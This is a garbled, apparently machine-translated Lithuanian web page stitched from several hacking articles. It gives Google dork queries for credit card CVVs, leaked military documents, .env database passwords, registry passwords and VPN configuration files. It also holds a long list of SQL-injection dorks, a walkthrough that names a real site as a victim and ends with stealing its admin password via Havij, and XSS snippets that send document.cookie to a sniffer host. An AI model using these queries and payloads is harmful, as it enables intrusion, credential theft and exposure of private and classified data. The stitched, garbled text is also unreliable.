Instrukcijos, kaip naudoti „jSQL Injection“, daugiafunkcį įrankį, skirtą SQL injekcijoms rasti ir naudoti „Kali Linux“. Mažai žinomų „Google“ funkcijų naudojimas norint rasti paslėptus produktus inurl paskelbimo peržiūros php id

Kiekvienam operatoriui yra lengva versija su trumpesniu pavadinimu (be priešdėlio visi). Skirtumas tas, kad allinurl ras nuorodas su visais žodžiais, o inurl – tik su pirmuoju iš jų. Antrieji ir paskesni užklausos žodžiai gali būti rodomi bet kurioje tinklalapio vietoje. Inurl operatorius taip pat skiriasi nuo kito operatoriaus, turinčio panašią reikšmę – site. Pirmoji taip pat leidžia rasti bet kokią simbolių seką nuorodoje į ieškomą dokumentą (pvz., /cgi-bin/), kuri plačiai naudojama ieškant komponentų su žinomomis pažeidžiamumu.

Pabandykime tai praktiškai. Paimame allintext filtrą ir pateikiame užklausą kredito kortelių, kurių galiojimas baigsis tik po dvejų metų (arba kai jų savininkai pavargs visus maitinti), numerių ir patvirtinimo kodų sąrašą.

Allintext: kortelės numerio galiojimo data /2017 cvv

Kai perskaitote naujienas, kad jaunas įsilaužėlis „įsilaužė į Pentagono ar NASA serverius“, pavogdamas įslaptintą informaciją, dažniausiai kalbame apie tokią pagrindinę „Google“ naudojimo techniką. Tarkime, mus domina NASA darbuotojų sąrašas ir jų kontaktinė informacija. Žinoma, tokį sąrašą galima rasti elektronine forma. Patogumo dėlei arba dėl priežiūros jis gali būti ir pačioje organizacijos svetainėje. Logiška, kad šiuo atveju nuorodų į jį nebus, nes jis skirtas vidiniam naudojimui. Kokie žodžiai gali būti tokiame faile? Mažiausiai - laukas „adresas“. Išbandyti visas šias prielaidas lengva.

Inurl:nasa.gov failo tipas:xlsx "adresas"

Tokie radiniai yra malonus prisilietimas. Išties solidų laimikį suteikia išsamesnės žiniatinklio valdytojams skirtos Google operatorių žinios, pats tinklas ir ieškomo struktūros ypatumai. Žinodami išsamią informaciją, galite lengvai filtruoti rezultatus ir patikslinti reikalingų failų savybes, kad gautumėte tikrai vertingų duomenų. Juokinga, kad čia į pagalbą ateina biurokratija. Jis gamina standartines formules, kurios yra patogios ieškant slaptos informacijos, netyčia nutekėjusios į internetą.

Pavyzdžiui, platinimo pareiškimo antspaudas, kurio reikalauja JAV Gynybos departamentas, reiškia standartizuotus dokumento platinimo apribojimus. Raidė A žymi viešus pranešimus, kuriuose nėra nieko slapto; B – skirtas tik vidiniam naudojimui, C – griežtai konfidencialus ir taip iki F. Atskirai išsiskiria raidė X, kuri žymi ypač vertingą aukščiausio lygio valstybės paslaptį reprezentuojančią informaciją. Tegul tie, kurie turi tai daryti budėdami, ieško tokių dokumentų, o mes apsiribosime failais su raide C. Pagal DoDI direktyvą 5230.24 šis žymėjimas priskiriamas dokumentams, kuriuose aprašomos svarbiausios technologijos, kurioms taikoma eksporto kontrolė. . Tokią kruopščiai saugomą informaciją galite rasti aukščiausio lygio domain.mil svetainėse, skirtose JAV armijai.

"PLATINIMAS C" inurl:navy.mil

Labai patogu, kad .mil domene yra tik JAV Gynybos departamento ir jo sutartinių organizacijų svetainės. Paieškos rezultatai su domeno apribojimu yra ypač švarūs, o pavadinimai kalba patys už save. Taip ieškoti rusiškų paslapčių praktiškai nenaudinga: domains.ru ir.rf viešpatauja chaosas, o daugelio ginklų sistemų pavadinimai skamba kaip botaniniai (PP „Kiparis“, savaeigiai ginklai „Akatsia“) ar net pasakiškai ( TOS „Buratino“).

Atidžiai išnagrinėję bet kurį dokumentą iš svetainės, esančios .mil domene, galite pamatyti kitus žymeklius, kad patikslintumėte paiešką. Pavyzdžiui, nuoroda į eksporto apribojimus „Sec 2751“, kuri taip pat patogi ieškant įdomios techninės informacijos. Retkarčiais jis pašalinamas iš oficialių svetainių, kuriose jis kadaise pasirodė, todėl, jei negalite sekti įdomios nuorodos paieškos rezultatuose, naudokite „Google“ talpyklą (talpyklos operatorių) arba interneto archyvo svetainę.

Be netyčia išslaptintų vyriausybės dokumentų, „Google“ talpykloje retkarčiais pasirodo nuorodos į asmeninius failus iš „Dropbox“ ir kitų duomenų saugojimo paslaugų, kurios sukuria „privačias“ nuorodas į viešai paskelbtus duomenis. Dar blogiau naudojant alternatyvias ir savadarbes paslaugas. Pavyzdžiui, ši užklausa randa duomenis apie visus „Verizon“ klientus, kurie turi įdiegtą FTP serverį ir aktyviai naudoja maršruto parinktuvą.

Allinurl:ftp://verizon.net

Tokių protingų žmonių dabar yra daugiau nei keturiasdešimt tūkstančių, o 2015 metų pavasarį jų buvo kur kas daugiau. Vietoj Verizon.net galite pakeisti bet kurio žinomo teikėjo pavadinimą ir kuo jis garsesnis, tuo didesnis sugautas kiekis. Per integruotą FTP serverį galite matyti failus išoriniame saugojimo įrenginyje, prijungtame prie maršrutizatoriaus. Paprastai tai yra NAS nuotoliniam darbui, asmeninis debesis arba koks nors lygiavertis failų atsisiuntimas. Visas tokios laikmenos turinys yra indeksuojamas Google ir kitų paieškos sistemų, todėl išoriniuose diskuose saugomus failus galite pasiekti naudodami tiesioginę nuorodą.

Prieš plačiai perkeliant į debesį, paprasti FTP serveriai buvo nuotolinė saugykla, kuri taip pat turėjo daug pažeidžiamumų. Daugelis jų yra aktualūs ir šiandien. Pavyzdžiui, populiari programa WS_FTP Professional saugo konfigūracijos duomenis, vartotojų abonementus ir slaptažodžius faile ws_ftp.ini. Jį lengva rasti ir perskaityti, nes visi įrašai išsaugomi teksto formatu, o slaptažodžiai užšifruojami naudojant Triple DES algoritmą po minimalaus užmaskavimo. Daugumoje versijų pakanka tiesiog atmesti pirmąjį baitą.

Tokius slaptažodžius lengva iššifruoti naudojant WS_FTP slaptažodžio iššifravimo įrankį arba nemokamą žiniatinklio paslaugą.

Kalbėdami apie įsilaužimą į savavališką svetainę, jie paprastai reiškia slaptažodžio gavimą iš TVS arba el. prekybos programų žurnalų ir konfigūracijos failų atsarginių kopijų. Jei žinote tipinę jų struktūrą, galite lengvai nurodyti raktinius žodžius. Tokios eilutės kaip ws_ftp.ini yra labai dažnos. Pavyzdžiui, Drupal ir PrestaShop visada yra vartotojo identifikatorius (UID) ir atitinkamas slaptažodis (pwd), o visa informacija saugoma failuose su plėtiniu .inc. Jų galite ieškoti taip:

"pwd=" "UID=" ext:inc

SQL serverių konfigūracijos failuose naudotojų vardai ir el. pašto adresai saugomi aiškiu tekstu, o jų MD5 maišos rašomos vietoj slaptažodžių. Griežtai tariant, jų iššifruoti neįmanoma, tačiau galite rasti atitikmenį tarp žinomų maišos ir slaptažodžių porų.

Vis dar yra DBVS, kurios net nenaudoja slaptažodžių maišos. Bet kurio iš jų konfigūracijos failus galima tiesiog peržiūrėti naršyklėje.

Intext:DB_PASSWORD failo tipas:env

Atsiradus „Windows“ serveriams, konfigūracijos failų vietą iš dalies užėmė registras. Lygiai taip pat galite ieškoti jo šakose, kaip failo tipą naudodami reg. Pavyzdžiui, taip:

Failo tipas:reg HKEY_CURRENT_USER "Slaptažodis"=

Kartais įslaptintą informaciją galima pasiekti naudojant duomenis, kurie buvo netyčia atidaryti ir pateko į Google dėmesį. Idealus variantas yra rasti slaptažodžių sąrašą įprastu formatu. Tik beviltiški žmonės gali saugoti paskyros informaciją tekstiniame faile, „Word“ dokumente ar „Excel“ skaičiuoklėje, tačiau jų visada yra pakankamai.

Failo tipas:xls inurl:slaptažodis

Viena vertus, yra daug priemonių užkirsti kelią tokiems incidentams. Būtina nurodyti tinkamas prieigos teises htaccess, pataisyti TVS, nenaudoti kairiarankių scenarijų ir uždaryti kitas skyles. Taip pat yra failas su robots.txt išimčių sąrašu, kuris draudžia paieškos sistemoms indeksuoti jame nurodytus failus ir katalogus. Kita vertus, jei kokiame nors serveryje robots.txt struktūra skiriasi nuo standartinės, tuomet iškart tampa aišku, ką jame bandoma paslėpti.

Prieš katalogų ir failų sąrašą bet kurioje svetainėje pateikiama standartinė rodyklė. Kadangi aptarnavimo tikslais jis turi būti nurodytas pavadinime, tikslinga apriboti paiešką tik intitle operatoriumi. Įdomūs dalykai yra /admin/, /personal/, /etc/ ir net /secret/ kataloguose.

Aktualumas čia itin svarbus: senos spragos uždaromos labai lėtai, tačiau Google ir jos paieškos rezultatai nuolat keičiasi. Netgi skiriasi „paskutinės sekundės“ filtras (&tbs=qdr:s užklausos URL pabaigoje) ir „realiojo laiko“ filtras (&tbs=qdr:1).

„Google“ netiesiogiai nurodo ir paskutinio failo atnaujinimo datos laiko intervalą. Per grafinę žiniatinklio sąsają galite pasirinkti vieną iš standartinių laikotarpių (valanda, diena, savaitė ir kt.) arba nustatyti datos intervalą, tačiau šis metodas netinka automatizavimui.

Iš adreso juostos išvaizdos galite tik spėlioti, kaip apriboti rezultatų išvestį naudojant &tbs=qdr: konstrukciją. Raidė y po jos nustato vienerių metų ribą (&tbs=qdr:y), m rodo paskutinio mėnesio rezultatus, w – savaitės, d – praėjusios dienos, h – paskutinės valandos, n – už minutę, o už s - duok man sek. Naujausi rezultatai, kuriuos ką tik paskelbė „Google“, randami naudojant filtrą &tbs=qdr:1 .

Jei jums reikia parašyti protingą scenarijų, bus naudinga žinoti, kad dienų seka Google sistemoje nustatoma Julian formatu, naudojant datos diapazono operatorių. Pavyzdžiui, taip galite rasti PDF dokumentų sąrašą su žodžiu konfidencialus, atsisiųstą nuo 2015 m. sausio 1 d. iki liepos 1 d.

Konfidencialus failo tipas: pdf datos diapazonas: 2457024-2457205

Diapazonas nurodomas Julijaus datos formatu, neatsižvelgiant į trupmeninę dalį. Išversti juos rankiniu būdu iš Grigaliaus kalendoriaus yra nepatogu. Paprasčiau naudoti datos keitiklį.

Be papildomų operatorių nurodymo paieškos užklausoje, jie gali būti siunčiami tiesiai į nuorodos turinį. Pavyzdžiui, failo tipas:pdf specifikacija atitinka konstrukciją as_filetype=pdf . Dėl to patogu prašyti bet kokių paaiškinimų. Tarkime, rezultatų išvestis tik iš Hondūro Respublikos nurodoma į paieškos URL pridedant konstrukciją cr=countryHN, o tik iš Bobruisko miesto - gcs=Bobruisk. Visą sąrašą galite rasti kūrėjo skiltyje.

„Google“ automatizavimo įrankiai sukurti taip, kad palengvintų gyvenimą, tačiau jie dažnai sukelia problemų. Pavyzdžiui, vartotojo miestas nustatomas pagal vartotojo IP per WHOIS. Remdamasi šia informacija, Google ne tik subalansuoja apkrovą tarp serverių, bet ir keičia paieškos rezultatus. Priklausomai nuo regiono, pirmajame puslapyje bus rodomi skirtingi tos pačios užklausos rezultatai, o kai kurie iš jų gali būti visiškai paslėpti. Dviejų raidžių kodas po gl=country direktyvos padės pasijusti kosmopolitu ir ieškoti informacijos iš bet kurios šalies. Pavyzdžiui, Nyderlandų kodas yra NL, bet Vatikanas ir Šiaurės Korėja neturi savo kodo Google.

Dažnai paieškos rezultatai būna netvarkingi net naudojant kelis išplėstinius filtrus. Tokiu atveju užklausą nesunku patikslinti pridedant kelis išimties žodžius (prieš kiekvieną iš jų dedamas minuso ženklas). Pavyzdžiui, bankininkystė, vardai ir pamoka dažnai vartojami su žodžiu Asmeninis. Todėl aiškesni paieškos rezultatai bus rodomi ne pagal vadovėlio užklausos pavyzdį, o pagal patobulintą:

Pavadinimas: „ /Personal/“ rodyklė – vardai – pamoka – bankininkystė

Įmantrus įsilaužėlis išsiskiria tuo, kad viskuo, ko reikia, aprūpina save pats. Pavyzdžiui, VPN yra patogus dalykas, bet arba brangus, arba laikinas ir su apribojimais. Užsisakyti prenumeratą sau yra per brangu. Gerai, kad yra grupiniai abonementai, o su Google pagalba paprasta tapti grupės dalimi. Norėdami tai padaryti, tiesiog suraskite Cisco VPN konfigūracijos failą, kuris turi gana nestandartinį PCF plėtinį ir atpažįstamą kelią: Program Files\Cisco Systems\VPN Client\Profiles. Vienas prašymas ir tu prisijungi, pavyzdžiui, prie draugiškos Bonos universiteto komandos.

Failo tipas: pcf vpn ARBA grupė

Slaptažodžiai saugomi šifruoti, tačiau Maurice'as Massardas jau parašė programą jiems iššifruoti ir nemokamai teikia per thecampusgeeks.com.

„Google“ vykdo šimtus įvairių tipų atakų ir įsiskverbimo testų. Yra daug parinkčių, veikiančių populiarias programas, pagrindinius duomenų bazių formatus, daugybę PHP pažeidžiamumų, debesų ir pan. Tiksliai žinant, ko ieškote, bus daug lengviau rasti reikiamą informaciją (ypač informaciją, kurios neketinote viešinti). „Shodan“ yra ne vienintelis, kuris maitina įdomias idėjas, bet ir kiekviena indeksuotų tinklo išteklių duomenų bazė!

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:straipsnis.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl: prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:tema.php ?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php ?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl :readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl :aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce .php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php ?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

čia yra mažas sąrašas. Galite naudoti savo. Taigi, mes radome svetainę. Pavyzdžiui, http://www.vestitambov.ru/
Tada atsisiųskite šią programą

Spustelėkite Gerai. Tada įterpiame aukos vietą.
Paspaudžiame startą. Toliau laukiame rezultatų.
Taigi programa rado SQL pažeidžiamumą.

Tada atsisiųskite Havij, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= įklijuokite ten gautą nuorodą. Neaiškinsiu, kaip naudoti Havij ir kur jį atsisiųsti; tai nėra sunku rasti. Visi. Gavote reikiamus duomenis – administratoriaus slaptažodį, o tada jau priklauso nuo jūsų fantazijos.

P.S. Tai mano pirmas bandymas ką nors parašyti. Atsiprašome, jei kažkas negerai

Nusprendžiau šiek tiek pakalbėti apie informacijos saugumą. Straipsnis bus naudingas pradedantiesiems programuotojams ir tiems, kurie ką tik pradėjo užsiimti „Frontend“ kūrimu. Kokia problema?

Daugelis pradedančiųjų kūrėjų taip užsiima kodo rašymu, kad visiškai pamiršta apie savo darbo saugumą. Ir, svarbiausia, jie pamiršta apie tokius pažeidžiamumus kaip SQL ir XXS užklausos. Jie taip pat sugalvoja paprastus slaptažodžius savo administracinėms grupėms ir yra veikiami žiaurios jėgos. Kas yra šie išpuoliai ir kaip jų išvengti?

SQL įterpimas yra labiausiai paplitęs atakos prieš duomenų bazę tipas, vykdomas atliekant SQL užklausą konkrečiai DBVS. Nuo tokių išpuolių kenčia daug žmonių ir net didelių įmonių. Priežastis – kūrėjo klaida rašant duomenų bazę ir, griežtai tariant, SQL užklausos.

SQL injekcijos ataka galima dėl neteisingo SQL užklausose naudojamų įvesties duomenų apdorojimo. Jei įsilaužėlio ataka bus sėkminga, rizikuojate prarasti ne tik duomenų bazių turinį, bet ir slaptažodžius bei administracinio skydelio žurnalus. Ir šių duomenų visiškai pakaks, kad svetainė būtų visiškai užvaldyta arba negrįžtamai ją pakoreguotų.

Ataka gali būti sėkmingai atkurta PHP, ASP, Perl ir kitomis kalbomis parašytais scenarijais. Tokių atakų sėkmė labiau priklauso nuo to, kokia DBVS naudojama ir kaip įgyvendinamas pats scenarijus. Pasaulyje yra daug pažeidžiamų svetainių SQL injekcijoms. Tai lengva patikrinti. Tiesiog įveskite „dorks“ – tai specialios užklausos ieškant pažeidžiamų svetainių. Štai keletas iš jų:

• inurl:index.php?id=
• inurl:trainers.php?id=
• inurl:pirkti.php?category=
• inurl: straipsnis.php?ID=
• inurl:play_old.php?id=
• inurl:declaration_more.php?decl_id=
• inurl:pageid=
• inurl:games.php?id=
• inurl:puslapis.php?file=
• inurl:newsDetail.php?id=
• inurl:gallery.php?id=
• inurl: straipsnis.php?id=

Kaip juos panaudoti? Tiesiog įveskite juos „Google“ arba „Yandex“ paieškos sistemoje. Paieškos variklis pateiks ne tik pažeidžiamą svetainę, bet ir puslapį apie šį pažeidžiamumą. Tačiau tuo neapsiribosime ir įsitikinsime, kad puslapis tikrai pažeidžiamas. Norėdami tai padaryti, po reikšmės "id=1" pakanka įdėti vieną kabutę "". Kažkas panašaus į tai:

• inurl:games.php?id=1'

Ir svetainė pateiks mums klaidą dėl SQL užklausos. Ko mūsų įsilaužėliui reikia toliau?

Ir tada jam reikia šios nuorodos į klaidos puslapį. Tada darbas su pažeidžiamumu daugeliu atvejų vyksta „Kali linux“ paskirstyme su šios dalies komunalinėmis priemonėmis: įvedamas įpurškimo kodas ir atliekamos reikiamos operacijos. Kaip tai atsitiks, negaliu jums pasakyti. Bet informacijos apie tai galite rasti internete.

Šio tipo atakos vykdomos prieš slapukų failus. Vartotojai, savo ruožtu, mėgsta juos išsaugoti. Kodėl gi ne? Ką mes darytume be jų? Galų gale, slapukų dėka, mums nereikia šimtą kartų įvesti Vk.com ar Mail.ru slaptažodžio. Ir mažai kas jų atsisako. Tačiau internete įsilaužėliams dažnai atsiranda taisyklė: patogumo koeficientas yra tiesiogiai proporcingas nesaugumo koeficientui.

Norint įgyvendinti XSS ataką, mūsų įsilaužėliui reikia žinių apie „JavaScript“. Iš pirmo žvilgsnio kalba yra labai paprasta ir nekenksminga, nes ji neturi prieigos prie kompiuterio išteklių. Įsilaužėlis gali dirbti tik su JavaScript naršyklėje, bet to pakanka. Juk svarbiausia įvesti kodą į tinklalapį.

Detaliau apie puolimo procesą nekalbėsiu. Aš jums papasakosiu tik pagrindus ir prasmę, kaip tai vyksta.

Įsilaužėlis gali pridėti JS kodą prie kurio nors forumo ar svečių knygos:

document.location.href ="http://192.168.1.7/sniff.php?test"

Skriptai nukreips mus į užkrėstą puslapį, kuriame bus vykdomas kodas: ar tai būtų sniffer, ar kokia nors saugykla, ar išnaudojimas, kuris kažkaip pavogs mūsų slapukus iš talpyklos.

Kodėl JavaScript? Nes JavaScript puikiai tvarko žiniatinklio užklausas ir turi prieigą prie slapukų. Bet jei mūsų scenarijus nuves mus į kokią nors svetainę, vartotojas lengvai tai pastebės. Čia įsilaužėlis naudoja gudresnį variantą – jis tiesiog įveda kodą į paveikslėlį.

Img=naujas vaizdas();

Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

Mes tiesiog sukuriame vaizdą ir priskiriame jam savo scenarijų kaip adresą.

Kaip nuo viso to apsisaugoti? Tai labai paprasta – nespauskite įtartinų nuorodų.

DoS (iš anglų kalbos Denial of Service - paslaugų atsisakymas) yra įsilaužėlių ataka prieš kompiuterinę sistemą, kurios tikslas – sugadinti ją. Taip sukuriamos sąlygos, kurioms esant bona fide sistemos vartotojai negali pasiekti suteiktų sistemos išteklių (serverių), arba ši prieiga yra apsunkinta. Sistemos gedimas taip pat gali būti žingsnis link jos perėmimo, jei kritinėje situacijoje programinė įranga pateikia bet kokią svarbią informaciją: pavyzdžiui, versiją, programos kodo dalį ir pan. Tačiau dažniausiai tai yra ekonominio spaudimo matas: paprastos paslaugos, kuri generuoja pajamas, praradimas. Tiekėjo sąskaitos arba priemonės, skirtos išvengti atakos, smarkiai pataikė į „taikinį“ kišenėje.Šiuo metu DoS ir DDoS atakos yra populiariausios, nes jos leidžia sugesti beveik bet kuriai sistemai nepaliekant teisiškai reikšmingų įrodymų.

Kuo skiriasi DoS ir DDos ataka?

DoS yra sumaniai sukurta ataka. Pavyzdžiui, jei serveris netikrina gaunamų paketų teisingumo, įsilaužėlis gali pateikti užklausą, kurios apdorojimas užtruks amžinai, o procesoriui neužteks laiko dirbti su kitais ryšiais. Atitinkamai, klientams bus atsisakyta teikti paslaugas. Tačiau tokiu būdu nebus įmanoma perkrauti ar išjungti didelių gerai žinomų svetainių. Jie yra ginkluoti gana plačiais kanalais ir itin galingais serveriais, kurie gali be jokių problemų susidoroti su tokia perkrova.

DDoS iš tikrųjų yra ta pati ataka kaip ir DoS. Bet jei DoS yra vienas užklausų paketas, tada DDoS jų gali būti šimtai ar daugiau. Net labai galingi serveriai gali neatlaikyti tokios perkrovos. Pateiksiu pavyzdį.

DoS ataka yra tada, kai kalbatės su kuo nors, bet tada atsiranda netinkamas žmogus ir pradeda garsiai šaukti. Tai arba neįmanoma, arba labai sunku kalbėti. Sprendimas: iškvieskite apsaugą, kuri nuramins ir pašalins žmogų iš patalpų. DDoS atakos yra tada, kai į vidų atskuba tūkstantinė tokių netinkamo elgesio žmonių minia. Tokiu atveju saugumas negalės visų surišti ir išvežti.

DoS ir DDoS vykdomi iš kompiuterių, vadinamųjų zombių. Tai kompiuterių įsilaužėlių vartotojų, kurie net neįtaria, kad jų kompiuteris dalyvauja kokio nors serverio atakoje.

Kaip nuo to apsisaugoti? Apskritai, jokiu būdu. Bet jūs galite apsunkinti įsilaužėlių reikalus. Norėdami tai padaryti, turite pasirinkti gerą prieglobą su galingais serveriais.

Kūrėjas gali sugalvoti daugybę apsaugos nuo atakų sistemų, visapusiškai peržiūrėti mūsų parašytus scenarijus, patikrinti, ar svetainėje nėra spragų ir pan. Tačiau kai jis pasiekia paskutinį svetainės išdėstymo veiksmą, ty kai tiesiog nustato administratoriaus skydelio slaptažodį, jis gali pamiršti vieną dalyką. Slaptažodis!

Griežtai nerekomenduojama nustatyti paprasto slaptažodžio. Tai gali būti 12345, 1114457, vasya111 ir tt Nerekomenduojama nustatyti trumpesnių nei 10-11 simbolių slaptažodžių. Priešingu atveju jums gali būti taikomas labiausiai paplitęs ir nesudėtingas išpuolis - Brute force.

Brute force – tai žodyno slaptažodžių paieškos ataka naudojant specialias programas. Žodynai gali būti įvairūs: lotynų, surašymas skaičiais, tarkime, iki tam tikro diapazono, mišrus (lot. + skaičiai), o yra net žodynų su unikaliais simboliais @#4$%&*~~`’”\ ? ir tt

Žinoma, tokio tipo atakų lengva išvengti, tereikia sugalvoti sudėtingą slaptažodį. Net „captcha“ gali jus išgelbėti. Be to, jei jūsų svetainė sukurta TVS, daugelis iš jų aptinka tokio tipo atakas ir blokuoja IP. Visada turite atsiminti, kad kuo daugiau slaptažodžio simbolių, tuo sunkiau jį atspėti.

Kaip veikia įsilaužėliai? Daugeliu atvejų jie įtaria arba žino dalį slaptažodžio iš anksto. Gana logiška manyti, kad vartotojo slaptažodis tikrai nebus sudarytas iš 3 ar 5 simbolių. Tokie slaptažodžiai sukelia dažną įsilaužimą. Iš esmės įsilaužėliai paima nuo 5 iki 10 simbolių ir prideda kelis simbolius, kuriuos gali žinoti iš anksto. Toliau generuojami slaptažodžiai su reikiamais diapazonais. „Kali Linux“ distribucija netgi turi programas tokiems atvejams. Ir voila, puolimas nebetruks ilgai, nes žodyno apimtis nebėra tokia didelė. Be to, įsilaužėlis gali panaudoti vaizdo plokštės galią. Kai kurie iš jų palaiko CUDA sistemą, o paieškos greitis padidėja net 10 kartų. Ir dabar matome, kad išpuolis tokiu paprastu būdu yra gana realus. Tačiau tai ne tik svetainės, kurioms taikoma brutali jėga.

Gerbiami kūrėjai, niekada nepamirškite apie informacijos apsaugos sistemą, nes šiandien daugelis žmonių, įskaitant valstybes, kenčia nuo tokio tipo atakų. Juk didžiausias pažeidžiamumas yra žmogus, kuris visada gali kur nors prasiblaškyti ar ką nors praleisti. Mes esame programuotojai, bet ne programuojamos mašinos. Visada būkite budrūs, nes informacijos praradimas gali turėti rimtų pasekmių!